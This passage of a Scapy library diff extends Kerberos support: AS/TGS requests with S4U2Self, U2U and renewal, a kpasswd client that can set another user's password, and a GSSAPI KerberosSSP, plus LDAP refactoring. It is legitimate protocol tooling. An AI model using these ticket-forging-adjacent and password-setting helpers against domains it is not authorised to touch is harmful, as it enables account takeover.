== 14: + return KPASSWD_REQ + elif asn1_tag == 15: + return KPASSWD_REP + return KPASSWD_REQ + + +bind_bottom_up(UDP, Kpasswd, sport=464) +bind_bottom_up(UDP, Kpasswd, dport=464) +bind_top_down(UDP, KPASSWD_REQ, sport=464, dport=464) +bind_top_down(UDP, KPASSWD_REP, sport=464, dport=464) + + +class KpasswdTCPHeader(Packet): + fields_desc = [LenField("len", None, fmt="!I")] + + @classmethod + def tcp_reassemble(cls, data, *args, **kwargs): + if len(data) < 4: + return None + length = struct.unpack("!I", data[:4])[0] + if len(data) == length + 4: + return cls(data) + + +bind_layers(KpasswdTCPHeader, Kpasswd) + +bind_bottom_up(TCP, KpasswdTCPHeader, sport=464) +bind_layers(TCP, KpasswdTCPHeader, dport=464) + + # Util functions class KerberosClient(Automaton): - RES = namedtuple("AS_Result", ["asrep", "sessionkey"]) + RES_AS_MODE = namedtuple("AS_Result", ["asrep", "sessionkey", "kdcrep"]) + RES_TGS_MODE = namedtuple("TGS_Result", ["tgsrep", "sessionkey", "kdcrep"]) + + class MODE(IntEnum): + AS_REQ = 0 + TGS_REQ = 1 def __init__( - self, ip=None, host=None, user=None, domain=None, key=None, port=88, **kwargs + self, + mode=MODE.AS_REQ, + ip=None, + host=None, + upn=None, + password=None, + realm=None, + spn=None, + ticket=None, + renew=False, + additional_tickets=[], + u2u=False, + for_user=None, + etypes=None, + key=None, + port=88, + timeout=5, + **kwargs, ): import scapy.libs.rfc3961 # Trigger error if any # noqa: F401 + from scapy.layers.ldap import dclocator + + if not upn: + raise ValueError("Invalid upn") + if not spn: + raise ValueError("Invalid spn") + if realm is None: + if mode == self.MODE.AS_REQ: + _, realm = _parse_upn(upn) + elif mode == self.MODE.TGS_REQ: + _, realm = _parse_spn(spn) + if not realm and ticket: + # if no realm is specified, but there's a ticket, take the realm + # of the ticket. + realm = ticket.realm.val.decode() + else: + raise ValueError("Invalid realm") + + if mode == self.MODE.AS_REQ: + if not host: + raise ValueError("Invalid host") + elif mode == self.MODE.TGS_REQ: + if not ticket: + raise ValueError("Invalid ticket") if not ip: - raise ValueError("Invalid IP") - if not host: - raise ValueError("Invalid host") - if not user: - raise ValueError("Invalid user") - if not domain: - raise ValueError("Invalid domain") + # No KDC IP provided. Find it by querying the DNS + ip = dclocator( + realm, + timeout=timeout, + # Use connect mode instead of ldap for compatibility + # with MIT kerberos servers + mode="connect", + port=port, + debug=kwargs.get("debug", 0), + ).ip + + if etypes is None: + from scapy.libs.rfc3961 import EncryptionType + + etypes = [ + EncryptionType.AES256_CTS_HMAC_SHA1_96, + EncryptionType.AES128_CTS_HMAC_SHA1_96, + EncryptionType.RC4_HMAC, + EncryptionType.DES_CBC_MD5, + ] + self.etypes = etypes - self.result = None # Result + self.mode = mode - sock = socket.socket() - sock.settimeout(5.0) - sock.connect((ip, port)) - sock = StreamSocket(sock, KerberosTCPHeader) + self.result = None # Result - self.host = bytes_encode(host).upper() - self.user = bytes_encode(user) - self.domain = bytes_encode(domain).upper() + self._timeout = timeout + self._ip = ip + self._port = port + sock = self._connect() + + if self.mode == self.MODE.AS_REQ: + self.host = host.upper() + self.password = password and bytes_encode(password) + self.spn = spn + self.upn = upn + self.realm = realm.upper() + self.ticket = ticket + self.renew = renew + self.additional_tickets = additional_tickets # U2U + S4U2Proxy + self.u2u = u2u # U2U + self.for_user = for_user # FOR-USER self.key = key + # See RFC4120 - sect 7.2.2 + # This marks whether we should follow-up after an EOF + self.should_followup = False + # Negotiated parameters self.pre_auth = False + self.fxcookie = None super(KerberosClient, self).__init__( - recvsock=lambda **_: sock, ll=lambda **_: sock, **kwargs + sock=sock, + **kwargs, ) + def _connect(self): + sock = socket.socket() + sock.settimeout(self._timeout) + sock.connect((self._ip, self._port)) + sock = StreamSocket(sock, KerberosTCPHeader) + return sock + def send(self, pkt): super(KerberosClient, self).send(KerberosTCPHeader() / pkt) - def ap_req(self): - from scapy.libs.rfc3961 import EncryptionType - - now_time = datetime.utcnow().replace(microsecond=0) + def _base_kdc_req(self, now_time): + kdcreq = KRB_KDC_REQ_BODY( + etype=[ASN1_INTEGER(x) for x in self.etypes], + additionalTickets=None, + # Windows default + kdcOptions="forwardable+renewable+canonicalize", + cname=None, + realm=ASN1_GENERAL_STRING(self.realm), + till=ASN1_GENERALIZED_TIME(now_time + timedelta(hours=10)), + rtime=ASN1_GENERALIZED_TIME(now_time + timedelta(hours=10)), + nonce=ASN1_INTEGER(RandNum(0, 0x7FFFFFFF)._fix()), + ) + if self.renew: + kdcreq.kdcOptions.set(30, 1) # set 'renew' (bit 30) + return kdcreq + + def as_req(self): + now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + + kdc_req = self._base_kdc_req(now_time=now_time) + kdc_req.addresses = [ + HostAddress( + addrType=ASN1_INTEGER(20), # Netbios + address=ASN1_STRING(self.host.ljust(16, " ")), + ) + ] + kdc_req.cname = PrincipalName.fromUPN(self.upn) + kdc_req.sname = PrincipalName.fromSPN(self.spn) - apreq = Kerberos( + asreq = Kerberos( root=KRB_AS_REQ( padata=[ PADATA( - padataType=ASN1_INTEGER(128), + padataType=ASN1_INTEGER(128), # PA-PAC-REQUEST padataValue=PA_PAC_REQUEST(includePac=ASN1_BOOLEAN(-1)), ) ], - reqBody=KRB_KDC_REQ_BODY( - etype=[ - ASN1_INTEGER(EncryptionType.AES256), - ASN1_INTEGER(EncryptionType.AES128), - ASN1_INTEGER(EncryptionType.RC4), - ASN1_INTEGER(EncryptionType.DES_MD5), - ], - addresses=[ - HostAddress( - addrType=ASN1_INTEGER(20), # Netbios - address=ASN1_STRING(self.host.ljust(16, b" ")), - ) - ], - additionalTickets=None, - # forwardable + renewable + canonicalize (default) - kdcOptions=ASN1_BIT_STRING("01000000100000010000000000010000"), - cname=PrincipalName( - nameString=[ASN1_GENERAL_STRING(self.user)], - nameType=ASN1_INTEGER(1), # NT-PRINCIPAL - ), - realm=ASN1_GENERAL_STRING(self.domain), - sname=PrincipalName( - nameString=[ - ASN1_GENERAL_STRING(b"krbtgt"), - ASN1_GENERAL_STRING(self.domain), - ], - nameType=ASN1_INTEGER(2), # NT-SRV-INST - ), - till=ASN1_GENERALIZED_TIME(now_time + timedelta(hours=10)), - rtime=ASN1_GENERALIZED_TIME(now_time + timedelta(hours=10)), - nonce=ASN1_INTEGER(RandNum(0, 0x7FFFFFFF)), - # Fun fact: the doc says nonce=UInt32 but if - # you use something greater than 0x7fffffff, the server - # sends back garbage... (bad cast? ^^) - ), + reqBody=kdc_req, ) ) + # Pre-auth support if self.pre_auth: - apreq.root.padata = [ + asreq.root.padata.insert( + 0, PADATA( padataType=0x2, # PA-ENC-TIMESTAMP padataValue=EncryptedData(), ), - apreq.root.padata[0], - ] - apreq.root.padata[0].padataValue.encrypt( + ) + asreq.root.padata[0].padataValue.encrypt( self.key, PA_ENC_TS_ENC(patimestamp=ASN1_GENERALIZED_TIME(now_time)) ) - return apreq + # Cookie support + if self.fxcookie: + asreq.root.padata.insert( + 0, + PADATA( + padataType=133, # PA-FX-COOKIE + padataValue=self.fxcookie, + ), + ) + return asreq + + def tgs_req(self): + now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + + kdc_req = self._base_kdc_req(now_time=now_time) + + _, crealm = _parse_upn(self.upn) + authenticator = KRB_Authenticator( + crealm=ASN1_GENERAL_STRING(crealm), + cname=PrincipalName.fromUPN(self.upn), + cksum=None, + ctime=ASN1_GENERALIZED_TIME(now_time), + cusec=ASN1_INTEGER(0), + subkey=None, + seqNumber=None, + encAuthorizationData=None, + ) + + apreq = KRB_AP_REQ(ticket=self.ticket, authenticator=EncryptedData()) + + # Additional tickets + if self.additional_tickets: + kdc_req.additionalTickets = self.additional_tickets + + if self.u2u: # U2U + kdc_req.kdcOptions.set(28, 1) # set 'enc-tkt-in-skey' (bit 28) + kdc_req.sname = PrincipalName.fromUPN(self.upn) + else: + # RFC 4120 sect 6.1 + # TODO: support XHST and other principals :D + kdc_req.sname = PrincipalName.fromSPN(self.spn) + + tgsreq = Kerberos( + root=KRB_TGS_REQ( + padata=[ + PADATA( + padataType=ASN1_INTEGER(1), # PA-TGS-REQ + padataValue=apreq, + ) + ], + reqBody=kdc_req, + ) + ) + + # [MS-SFU] FOR-USER extension + if self.for_user is not None: + from scapy.libs.rfc3961 import ChecksumType + + paforuser = PA_FOR_USER( + userName=PrincipalName.fromUPN(self.for_user), + userRealm=ASN1_GENERAL_STRING(_parse_upn(self.for_user)[1]), + cksum=Checksum(), + ) + S4UByteArray = struct.pack( # [MS-SFU] sect 2.2.1 + "" + :param ip: the KDC ip. (optional. If not provided, Scapy will query the DNS for + _kerberos._tcp.dc._msdcs.domain.local). + :param key: (optional) pass the Key object. :param password: (optional) otherwise, pass the user's password + :param realm: (optional) the realm to use. Otherwise use the one from UPN. + :param host: (optional) the host performing the AS-Req. WIN10 by default. :return: returns a named tuple (asrep=<...>, sessionkey=<...>) @@ -1667,19 +2845,12 @@ def krb_as_req(upn, ip, key=None, password=None, **kwargs): Equivalent:: >>> from scapy.libs.rfc3961 import Key, EncryptionType - >>> key = Key(EncryptionType.AES256, key=hex_bytes("6d0748c546f4e99205 - ...: e78f8da7681d4ec5520ae4815543720c2a647c1ae814c9")) + >>> key = Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, key=hex_bytes("6d0748c546 + ...: f4e99205e78f8da7681d4ec5520ae4815543720c2a647c1ae814c9")) >>> krb_as_req("user1@DOMAIN.LOCAL", "192.168.122.17", key=key) """ - m = re.match(r"^([^@\\]+)(@|\\)([^@\\]+)$", upn) - if not m: - raise ValueError("Invalid UPN !") - if m.group(2) == "@": - user = m.group(1) - domain = m.group(3) - else: - user = m.group(3) - domain = m.group(1) + if realm is None: + _, realm = _parse_upn(upn) if key is None: if password is None: try: @@ -1688,23 +2859,618 @@ def krb_as_req(upn, ip, key=None, password=None, **kwargs): password = prompt("Enter password: ", is_password=True) except ImportError: password = input("Enter password: ") - if user.endswith("$"): - # Machine account - salt = ( - domain.upper().encode() + - b"host" + - user.lower().encode() + - b"." + - domain.lower().encode() - ) - else: - salt = domain.upper().encode() + user.encode() - from scapy.libs.rfc3961 import Key, EncryptionType + cli = KerberosClient( + mode=KerberosClient.MODE.AS_REQ, + realm=realm, + ip=ip, + spn=spn or "krbtgt/" + realm, + host=host, + upn=upn, + password=password, + key=key, + **kwargs, + ) + cli.run() + cli.stop() + return cli.result + + +def krb_tgs_req( + upn, + spn, + sessionkey, + ticket, + ip=None, + renew=False, + realm=None, + additional_tickets=[], + u2u=False, + etypes=None, + for_user=None, + **kwargs, +): + r""" + Kerberos TGS-Req + + :param upn: the user principal name formatted as "DOMAIN\user", "DOMAIN/user" + or "user@DOMAIN" + :param spn: the full service principal name (e.g. "cifs/srv1") + :param sessionkey: the session key retrieved from the tgt + :param ticket: the tgt ticket + :param ip: the KDC ip. (optional. If not provided, Scapy will query the DNS for + _kerberos._tcp.dc._msdcs.domain.local). + :param renew: ask for renewal + :param realm: (optional) the realm to use. Otherwise use the one from SPN. + :param additional_tickets: (optional) a list of additional tickets to pass. + :param u2u: (optional) if specified, enable U2U and request the ticket to be + signed using the session key from the first additional ticket. + :param etypes: array of EncryptionType values. + By default: AES128, AES256, RC4, DES_MD5 + :param for_user: a user principal name to request the ticket for. This is the + S4U2Self extension. + + :return: returns a named tuple (tgsrep=<...>, sessionkey=<...>) + + Example:: + + >>> # The KDC is on 192.168.122.17, we ask a TGT for user1 + >>> krb_as_req("user1@DOMAIN.LOCAL", "192.168.122.17", password="Password1") - key = Key.string_to_key(EncryptionType.AES256, password.encode(), salt) + Equivalent:: + + >>> from scapy.libs.rfc3961 import Key, EncryptionType + >>> key = Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, key=hex_bytes("6d0748c546 + ...: f4e99205e78f8da7681d4ec5520ae4815543720c2a647c1ae814c9")) + >>> krb_as_req("user1@DOMAIN.LOCAL", "192.168.122.17", key=key) + """ cli = KerberosClient( - domain=domain, ip=ip, host="WIN1", user=user, key=key, **kwargs + mode=KerberosClient.MODE.TGS_REQ, + realm=realm, + upn=upn, + ip=ip, + spn=spn, + key=sessionkey, + ticket=ticket, + renew=renew, + additional_tickets=additional_tickets, + u2u=u2u, + etypes=etypes, + for_user=for_user, + **kwargs, ) cli.run() cli.stop() return cli.result + + +def krb_as_and_tgs(upn, spn, ip=None, key=None, password=None, **kwargs): + """ + Kerberos AS-Req then TGS-Req + """ + res = krb_as_req(upn=upn, ip=ip, key=key, password=password, **kwargs) + if not res: + return + return krb_tgs_req( + upn=upn, + spn=spn, + sessionkey=res.sessionkey, + ticket=res.asrep.ticket, + ip=ip, + **kwargs, + ) + + +def kpasswd( + upn, + targetupn=None, + ip=None, + password=None, + newpassword=None, + key=None, + ticket=None, + realm=None, + ssp=None, + setpassword=None, + timeout=3, + port=464, + debug=0, + **kwargs, +): + """ + Change a password using RFC3244's Kerberos Set / Change Password. + + :param upn: the UPN to use for authentication + :param targetupn: (optional) the UPN to change the password of. If not specified, + same as upn. + :param ip: the KDC ip. (optional. If not provided, Scapy will query the DNS for + _kerberos._tcp.dc._msdcs.domain.local). + :param key: (optional) pass the Key object. + :param ticket: (optional) a ticket to use. Either a TGT or ST for kadmin/changepw. + :param password: (optional) otherwise, pass the user's password + :param realm: (optional) the realm to use. Otherwise use the one from UPN. + :param setpassword: (optional) use "Set Password" mechanism. + :param ssp: (optional) a Kerberos SSP for the service kadmin/changepw@REALM. + If provided, you probably don't need anything else. Otherwise built. + """ + from scapy.layers.ldap import dclocator + + if not realm: + _, realm = _parse_upn(upn) + spn = "kadmin/changepw@%s" % realm + if ip is None: + ip = dclocator( + realm, + timeout=timeout, + # Use connect mode instead of ldap for compatibility + # with MIT kerberos servers + mode="connect", + port=port, + debug=debug, + ).ip + if ssp is None and ticket is not None: + tktspn = ticket.getSPN().split("/")[0] + assert tktspn in ["krbtgt", "kadmin"], "Unexpected ticket type ! %s" % tktspn + if tktspn == "krbtgt": + log_runtime.info( + "Using 'Set Password' mode. This only works with admin privileges." + ) + setpassword = True + resp = krb_tgs_req( + upn=upn, + spn=spn, + ticket=ticket, + sessionkey=key, + ip=ip, + debug=debug, + ) + if resp is None: + return + ticket = resp.tgsrep.ticket + key = resp.sessionkey + if setpassword is None: + setpassword = bool(targetupn) + elif setpassword and targetupn is None: + targetupn = upn + assert setpassword or not targetupn, "Cannot use targetupn in changepassword mode !" + # Get a ticket for kadmin/changepw + if ssp is None: + if ticket is None: + # Get a ticket for kadmin/changepw through AS-REQ + resp = krb_as_req( + upn=upn, + spn=spn, + key=key, + ip=ip, + password=password, + debug=debug, + ) + if resp is None: + return + ticket = resp.asrep.ticket + key = resp.sessionkey + ssp = KerberosSSP( + UPN=upn, + SPN=spn, + ST=ticket, + KEY=key, + DC_IP=ip, + MUTUAL=False, + debug=debug, + **kwargs, + ) + Context, tok, negResult = ssp.GSS_Init_sec_context(None) + if negResult != GSS_S_CONTINUE_NEEDED: + warning("SSP failed on initial GSS_Init_sec_context !") + if tok: + tok.show() + return + apreq = tok.innerToken.root + # Connect + sock = socket.socket() + sock.settimeout(timeout) + sock.connect((ip, port)) + sock = StreamSocket(sock, KpasswdTCPHeader) + # Do KPASSWD request + if newpassword is None: + try: + from prompt_toolkit import prompt + + newpassword = prompt("Enter NEW password: ", is_password=True) + except ImportError: + newpassword = input("Enter NEW password: ") + krbpriv = KRB_PRIV(encPart=EncryptedData()) + krbpriv.encPart.encrypt( + Context.KrbSessionKey, + EncKrbPrivPart( + sAddress=HostAddress( + addrType=ASN1_INTEGER(2), # IPv4 + address=ASN1_STRING(b"\xc0\xa8\x00e"), + ), + userData=ASN1_STRING( + bytes( + ChangePasswdData( + newpasswd=newpassword, + targname=PrincipalName.fromUPN(targetupn), + targrealm=realm, + ) + ) + if setpassword + else newpassword + ), + timestamp=None, + usec=None, + seqNumber=Context.SeqNum, + ), + ) + resp = sock.sr1( + KpasswdTCPHeader() + / KPASSWD_REQ( + pvno=0xFF80 if setpassword else 1, + apreq=apreq, + krbpriv=krbpriv, + ), + timeout=timeout, + verbose=0, + ) + # Verify KPASSWD response + if not resp: + raise TimeoutError("KPASSWD_REQ timed out !") + if KPASSWD_REP not in resp: + raise ValueError("Invalid response to KPASSWD_RED !") + Context, tok, negResult = ssp.GSS_Init_sec_context(Context, resp.aprep) + if negResult != GSS_S_COMPLETE: + warning("SSP failed on subsequent GSS_Init_sec_context !") + if tok: + tok.show() + return + # Parse answer KRB_PRIV + krbanswer = resp.krbpriv.encPart.decrypt(Context.KrbSessionKey) + userRep = KPasswdRepData(krbanswer.userData.val) + if userRep.resultCode != 0: + warning(userRep.sprintf("KPASSWD failed !")) + userRep.show() + return + print(userRep.sprintf("%resultCode%")) + + +# SSP + + +class KerberosSSP(SSP): + """ + The KerberosSSP + + :param auth_level: One of DCE_C_AUTHN_LEVEL + + Client settings: + + :param ST: the service ticket to use for access. + If not provided, will be retrieved + :param SPN: the SPN of the service to use + :param UPN: The client UPN + :param DC_IP: (optional) is ST+KEY are not provided, will need to contact + the KDC at this IP. If not provided, will perform dc locator. + :param TGT: (optional) pass a TGT to use to get the ST. + :param KEY: the session key associated with the ST if it is provided, + OR the session key associated with the TGT + OR the kerberos key associated with the UPN + :param PASSWORD: (optional) if a UPN is provided and not a KEY, this is the + password of the UPN. + + Server settings: + + :param SPN: the SPN of the service to use + :param KEY: the kerberos key to use to decrypt the AP-req + :param TGT: (optional) pass a TGT to use for U2U + :param DC_IP: (optional) if TGT is not provided, request one on the KDC at + this IP using using the KEY when using U2U. + :param REQUIRE_U2U: (optional, default False) require U2U + """ + + oid = "1.2.840.113554.1.2.2" + auth_type = 0x10 + + class STATE(SSP.STATE): + INIT = 1 + CLI_SENT_APREQ = 2 + CLI_RCVD_APREP = 3 + SRV_SENT_APREP = 4 + + class CONTEXT(SSP.CONTEXT): + __slots__ = [ + "SessionKey", + "ServerHostname", + "KrbSessionKey", # raw Key object, set by client + "SeqNum", + ] + + def __init__(self): + self.state = KerberosSSP.STATE.INIT + self.SessionKey = None + self.ServerHostname = None + + def __repr__(self): + return "KerberosSSP" + + def __init__( + self, + ST=None, + UPN=None, + PASSWORD=None, + KEY=None, + SPN=None, + TGT=None, + DC_IP=None, + REQUIRE_U2U=False, + MUTUAL=True, + debug=0, + **kwargs, + ): + self.ST = ST + self.UPN = UPN + self.KEY = KEY + self.SPN = SPN + self.TGT = TGT + self.PASSWORD = PASSWORD + self.DC_IP = DC_IP + self.REQUIRE_U2U = REQUIRE_U2U + self.MUTUAL = MUTUAL + self.debug = debug + super(KerberosSSP, self).__init__(**kwargs) + + def _setup_u2u(self): + if not self.TGT: + # Get a TGT for ourselves + try: + upn = "@".join(self.SPN.split("/")[1].split(".", 1)) + except KeyError: + raise ValueError("Couldn't transform the SPN into a valid UPN") + res = krb_as_req(upn, self.DC_IP, key=self.KEY) + self.TGT, self.KEY = res.asrep.ticket, res.sessionkey + + def GSS_Init_sec_context(self, Context: CONTEXT, val=None): + if Context is None: + # New context + Context = self.CONTEXT() + + from scapy.libs.rfc3961 import Key, EncryptionType + + if Context.state == self.STATE.INIT: + if not self.UPN: + raise ValueError("Missing UPN attribute") + # Do we have a ST? + if self.ST is None: + # Client sends an AP-req + if not self.SPN: + raise ValueError("Missing SPN attribute") + if self.TGT is not None: + if not self.KEY: + raise ValueError("Cannot use TGT without the KEY") + # Use TGT + res = krb_tgs_req( + upn=self.UPN, + spn=self.SPN, + ip=self.DC_IP, + sessionkey=self.KEY, + ticket=self.TGT, + debug=self.debug, + ) + else: + # Ask for TGT then ST + res = krb_as_and_tgs( + upn=self.UPN, + spn=self.SPN, + ip=self.DC_IP, + key=self.KEY, + password=self.PASSWORD, + debug=self.debug, + ) + if not res: + # Failed to retrieve the ticket + return Context, None, GSS_S_FAILURE + self.ST, self.KEY = res.tgsrep.ticket, res.sessionkey + elif not self.KEY: + raise ValueError("Must provide KEY with ST") + # Save ServerHostname + if len(self.ST.sname.nameString) == 2: + Context.ServerHostname = self.ST.sname.nameString[1].val.decode() + # Build the KRB-AP + ap_req = KRB_GSSAPI_Token( + innerToken=KRB_InnerToken( + root=KRB_AP_REQ( + apOptions=( + ASN1_BIT_STRING("001") # mutual-required + if self.MUTUAL + else ASN1_BIT_STRING("000") + ), + ticket=self.ST, + authenticator=EncryptedData(), + ) + ) + ) + # Build the authenticator + now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + Context.KrbSessionKey = Key.random_to_key( + EncryptionType.AES128_CTS_HMAC_SHA1_96, + os.urandom(16), + ) + Context.SeqNum = RandNum(0, 0x7FFFFFFF)._fix() + ap_req.innerToken.root.authenticator.encrypt( + self.KEY, + KRB_Authenticator( + crealm=self.ST.realm, + cname=PrincipalName.fromUPN(self.UPN), + # RFC 4121 checksum + cksum=Checksum( + cksumtype="KRB-AUTHENTICATOR", + checksum=KRB_AuthenticatorChecksum( + Flags=( + "GSS_C_MUTUAL_FLAG+GSS_C_EXTENDED_ERROR_FLAG" + if self.MUTUAL + else "GSS_C_EXTENDED_ERROR_FLAG" + ) + ), + ), + ctime=ASN1_GENERALIZED_TIME(now_time), + cusec=ASN1_INTEGER(0), + subkey=EncryptionKey.fromKey(Context.KrbSessionKey), + seqNumber=Context.SeqNum, + encAuthorizationData=AuthorizationData( + seq=[ + AuthorizationDataItem( + adType="AD-IF-RELEVANT", + adData=AuthorizationData( + seq=[ + AuthorizationDataItem( + adType="KERB-AUTH-DATA-TOKEN-RESTRICTIONS", + adData=KERB_AD_RESTRICTION_ENTRY( + restriction=LSAP_TOKEN_INFO_INTEGRITY( + MachineID=bytes(RandBin(32)) + ) + ), + ), + AuthorizationDataItem( + adType="KERB-LOCAL", + adData=b"\x00" * 16, + ), + ] + ), + ) + ] + ), + ), + ) + Context.state = self.STATE.CLI_SENT_APREQ + return Context, ap_req, GSS_S_CONTINUE_NEEDED + elif Context.state == self.STATE.CLI_SENT_APREQ: + if isinstance(val, KRB_AP_REP): + # Raw AP_REP was passed + ap_rep = val + else: + try: + # GSSAPI/Kerberos + ap_rep = val.root.innerToken.root + except AttributeError: + try: + # Raw Kerberos + ap_rep = val.innerToken.root + except AttributeError: + return Context, None, GSS_S_DEFECTIVE_TOKEN + if not isinstance(ap_rep, KRB_AP_REP): + ap_rep.show() + raise ValueError("KerberosSSP: Unexpected token !") + # Retrieve SessionKey + repPart = ap_rep.encPart.decrypt(self.KEY) + if repPart.subkey is not None: + Context.SessionKey = repPart.subkey.keyvalue.val + # OK ! + Context.state = self.STATE.CLI_RCVD_APREP + return Context, None, GSS_S_COMPLETE + else: + raise ValueError("KerberosSSP: Unknown state") + + def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): + if Context is None: + # New context + Context = self.CONTEXT() + + from scapy.libs.rfc3961 import Key, EncryptionType + + if Context.state == self.STATE.INIT: + if not self.SPN: + raise ValueError("Missing SPN attribute") + # Server receives AP-req, sends AP-rep + try: + # GSSAPI/Kerberos + ap_req = val.root.innerToken.root + except AttributeError: + try: + # Raw Kerberos + ap_req = val.root + except AttributeError: + return Context, None, GSS_S_DEFECTIVE_TOKEN + if isinstance(ap_req, KRB_TGT_REQ): + # Special U2U case + self._setup_u2u() + return ( + None, + KRB_GSSAPI_Token( + MechType="1.2.840.113554.1.2.2.3", # U2U + innerToken=KRB_InnerToken( + TOK_ID=b"\x04\x01", + root=KRB_TGT_REP( + ticket=self.TGT, + ), + ), + ), + GSS_S_CONTINUE_NEEDED, + ) + elif not isinstance(ap_req, KRB_AP_REQ): + ap_req.show() + raise ValueError("Unexpected type in KerberosSSP") + if not self.KEY: + raise ValueError("Missing KEY attribute") + # Validate SPN + tkt_spn = "/".join( + x.val.decode() for x in ap_req.ticket.sname.nameString[:2] + ).lower() + if tkt_spn not in [self.SPN.lower(), self.SPN.lower().split(".", 1)[0]]: + warning("KerberosSSP: bad SPN: %s != %s" % (tkt_spn, self.SPN)) + return Context, None, GSS_S_BAD_MECH + # Enforce U2U if required + if self.REQUIRE_U2U and ap_req.apOptions.val[1] != "1": # use-session-key + # Required but not provided. Return an error + self._setup_u2u() + now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + err = KRB_GSSAPI_Token( + innerToken=KRB_InnerToken( + TOK_ID=b"\x03\x00", + root=KRB_ERROR( + errorCode="KRB_AP_ERR_USER_TO_USER_REQUIRED", + stime=ASN1_GENERALIZED_TIME(now_time), + realm=ap_req.ticket.realm, + sname=ap_req.ticket.sname, + eData=KRB_TGT_REP( + ticket=self.TGT, + ), + ), + ) + ) + return Context, err, GSS_S_CONTINUE_NEEDED + # Decrypt the ticket + try: + tkt = ap_req.ticket.encPart.decrypt(self.KEY) + except ValueError as ex: + warning("KerberosSSP: %s (bad KEY?)" % ex) + return Context, None, GSS_S_DEFECTIVE_TOKEN + # Get AP-REP session key + sessionkey = tkt.key.toKey() + authenticator = ap_req.authenticator.decrypt(sessionkey) + # Compute an application session key ([MS-KILE] sect 3.1.1.2) + subkey = None + if ap_req.apOptions.val[2] == "1": # mutual-required + appkey = Key.random_to_key( + EncryptionType.AES128_CTS_HMAC_SHA1_96, + os.urandom(16), + ) + Context.KrbSessionKey = appkey + Context.SessionKey = appkey.key + subkey = EncryptionKey.fromKey(appkey) + else: + Context.KrbSessionKey = self.KEY + Context.SessionKey = self.KEY.key + # Build response (RFC4120 sect 3.2.4) + ap_rep = KRB_AP_REP(encPart=EncryptedData()) + ap_rep.encPart.encrypt( + sessionkey, + EncAPRepPart( + ctime=authenticator.ctime, + cusec=authenticator.cusec, + seqNumber=None, + subkey=subkey, + ), + ) + Context.state = self.STATE.SRV_SENT_APREP + return Context, ap_rep, GSS_S_COMPLETE # success + else: + raise ValueError("KerberosSSP: Unknown state %s" % repr(Context.state)) diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index f9f297d1065..9fed74ea7c0 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -8,10 +8,23 @@ RFC 1777 - LDAP v2 RFC 4511 - LDAP v3 + +Note: to mimic Microsoft Windows LDAP packets, you must set:: + + conf.ASN1_default_long_size = 4 """ -from scapy.automaton import Automaton, ATMT -from scapy.asn1.asn1 import ASN1_STRING, ASN1_Class_UNIVERSAL, ASN1_Codecs +import collections +import socket +import uuid + +from scapy.ansmachine import AnsweringMachine +from scapy.asn1.asn1 import ( + ASN1_STRING, + ASN1_SEQUENCE, + ASN1_Class_UNIVERSAL, + ASN1_Codecs, +) from scapy.asn1.ber import BERcodec_SEQUENCE from scapy.asn1fields import ( ASN1F_BOOLEAN, @@ -27,10 +40,19 @@ ASN1F_optional, ) from scapy.asn1packet import ASN1_Packet +from scapy.config import conf +from scapy.error import log_runtime from scapy.packet import bind_bottom_up, bind_layers - -from scapy.layers.inet import TCP, UDP -from scapy.layers.ntlm import NTLM_Client +from scapy.supersocket import SimpleSocket + +from scapy.layers.dns import dns_resolve +from scapy.layers.inet import IP, TCP, UDP +from scapy.layers.inet6 import IPv6 +from scapy.layers.gssapi import GSSAPI_BLOB +from scapy.layers.kerberos import _ASN1FString_PacketField +from scapy.layers.smb import ( + NETLOGON_SAM_LOGON_RESPONSE_EX, +) # Elements of protocol # https://datatracker.ietf.org/doc/html/rfc1777#section-4 @@ -48,7 +70,7 @@ class AttributeValueAssertion(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( AttributeType("attributeType", "organizationName"), - AttributeValue("attributeValue", "") + AttributeValue("attributeValue", ""), ) @@ -57,63 +79,84 @@ class LDAPReferral(ASN1_Packet): ASN1_root = LDAPString("uri", "") -LDAPResult = ASN1F_SEQUENCE( - ASN1F_ENUMERATED("resultCode", 0, { - 0: "success", - 1: "operationsError", - 2: "protocolError", - 3: "timeLimitExceeded", - 4: "sizeLimitExceeded", - 5: "compareFalse", - 6: "compareTrue", - 7: "authMethodNotSupported", - 8: "strongAuthRequired", - 16: "noSuchAttribute", - 17: "undefinedAttributeType", - 18: "inappropriateMatching", - 19: "constraintViolation", - 20: "attributeOrValueExists", - 21: "invalidAttributeSyntax", - 32: "noSuchObject", - 33: "aliasProblem", - 34: "invalidDNSyntax", - 35: "isLeaf", - 36: "aliasDereferencingProblem", - 48: "inappropriateAuthentication", - 49: "invalidCredentials", - 50: "insufficientAccessRights", - 51: "busy", - 52: "unavailable", - 53: "unwillingToPerform", - 54: "loopDetect", - 64: "namingViolation", - 65: "objectClassViolation", - 66: "notAllowedOnNonLeaf", - 67: "notAllowedOnRDN", - 68: "entryAlreadyExists", - 69: "objectClassModsProhibited", - 70: "resultsTooLarge", # CLDAP - 80: "other", - }), +LDAPResult = ( + ASN1F_ENUMERATED( + "resultCode", + 0, + { + 0: "success", + 1: "operationsError", + 2: "protocolError", + 3: "timeLimitExceeded", + 4: "sizeLimitExceeded", + 5: "compareFalse", + 6: "compareTrue", + 7: "authMethodNotSupported", + 8: "strongAuthRequired", + 16: "noSuchAttribute", + 17: "undefinedAttributeType", + 18: "inappropriateMatching", + 19: "constraintViolation", + 20: "attributeOrValueExists", + 21: "invalidAttributeSyntax", + 32: "noSuchObject", + 33: "aliasProblem", + 34: "invalidDNSyntax", + 35: "isLeaf", + 36: "aliasDereferencingProblem", + 48: "inappropriateAuthentication", + 49: "invalidCredentials", + 50: "insufficientAccessRights", + 51: "busy", + 52: "unavailable", + 53: "unwillingToPerform", + 54: "loopDetect", + 64: "namingViolation", + 65: "objectClassViolation", + 66: "notAllowedOnNonLeaf", + 67: "notAllowedOnRDN", + 68: "entryAlreadyExists", + 69: "objectClassModsProhibited", + 70: "resultsTooLarge", # CLDAP + 80: "other", + }, + ), 